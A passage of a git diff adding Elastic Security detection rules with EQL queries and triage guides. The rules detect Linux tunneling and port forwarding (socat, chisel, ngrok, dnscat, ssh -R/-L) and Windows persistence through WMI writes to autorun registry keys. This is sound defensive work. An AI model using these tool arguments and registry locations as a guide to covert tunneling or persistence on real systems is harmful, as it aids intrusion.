host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\nevent.type == \"start\" and (\n (\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6ee947e9-de7e-4281-a55d-09289bdf947e", + "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "6ee947e9-de7e-4281-a55d-09289bdf947e_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json new file mode 100644 index 00000000000..13fec0a11f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Tunneling and/or Port Forwarding", + "note": "## Triage and analysis\n\n### Investigating Potential Linux Tunneling and/or Port Forwarding\n\nAttackers can leverage many utilities to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several utilities that are capable of setting up tunnel network communications by analyzing process names or command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n", + "references": [ + "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", + "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6ee947e9-de7e-4281-a55d-09289bdf947e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "6ee947e9-de7e-4281-a55d-09289bdf947e_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json new file mode 100644 index 00000000000..16205275ed5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Standard Registry Provider", + "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and\n registry.data.strings != null and process.name : \"WmiPrvSe.exe\" and\n registry.path : (\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\UserInitMprLogonScript\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\"\n )\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/regprov/stdregprov", + "https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + }, + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json new file mode 100644 index 00000000000..5ca7f940618 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/70d12c9c-0dbd-4a1a-bc44-1467502c9cf6_108.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of the Windows Management Instrumentation StdRegProv (registry provider) to modify commonly abused registry locations for persistence.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via WMI Standard Registry Provider", + "note": "## Triage and analysis\n\n### Investigating Persistence via WMI Standard Registry Provider\n\nThe Windows Management Instrumentation (WMI) StdRegProv is a registry provider that allows users to manage registry keys and values on Windows systems. Adversaries may abuse this functionality to modify registry locations commonly used for persistence, enabling them to maintain unauthorized access to a system.\n\nThis rule identifies instances where the WMI StdRegProv is used to modify specific registry paths associated with persistence mechanisms.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify which process triggered this behavior.\n- Verify whether the file specified in the run key is signed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Examine the file specified in the run key using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 